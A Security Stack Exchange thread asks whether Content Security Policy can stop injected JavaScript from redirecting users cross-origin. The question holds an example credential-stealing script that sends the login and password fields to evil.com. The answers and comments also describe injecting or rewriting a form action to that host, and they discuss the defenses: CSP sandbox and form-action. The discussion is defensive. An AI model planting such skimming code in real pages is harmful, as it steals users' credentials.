# Prevent javascript cross-origin redirect by window.location.href

Tags: xss, javascript, content-security-policy

Following [this question](https://security.stackexchange.com/questions/200190/prevent-javascript-cross-origin-write), is there a way to prevent this code from redirecting users to domains not whitelisted?

```
const form = document.getElementsByTagName('form')[0];

form.addEventListener('submit', stealCredentials);

function stealCredentials() {
    const login = document.getElementsByName('login')[0].value;
    const password = document.getElementsByName('password')[0].value;

    window.location.href = 'http://evil.com/?login=' + login + '&password=' + password
}
```

Is there a clean way to do it? Like Content Security Policy or something similar?

Answer (score 3):

Sadly, it's not possible.

You can check that with the following HTML snippet where the default CSP directive is set to `none` (except `script-src`):

```
<meta http-equiv="Content-Security-Policy" content="default-src 'none'; script-src 'unsafe-inline'">
<script>window.location = '?' + Math.random();</script>
```

Since `window.location` is a non-configurable property, it's not possible to rewrite / proxy it to match your needs.

Note: it's possible to listen for the `beforeunload` event and trying to prevent it, but the user will most likely ignore the warning message that will show up.

Comment: Thank you for your answer.
I find it a little concerning that CSP can be bypassed by something this simple.

Answer (score 1):

There is a CSP directive that prevents this, but it's probably not what you meant:

```
Content-Security-Policy: sandbox
```

This disables all JavaScript, making it impossible to redirect by assigning to `window.location`.

However, stealing passwords may be possible with an HTML injection attack even if you disable JavaScript. If an attacker can inject his own `<form action="http://evil.com/">` tag, the credentials from the login form are sent to the attacker.

Comment: Thank you for your answer.
I got HTML injection covered, but your example reminds me of something:
An attacker can use JavaScript to edit the `action` attribute of the login form, thus posting its content to http://evil.com/.
Note that the [form-action](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/form-action) CSP can prevent that.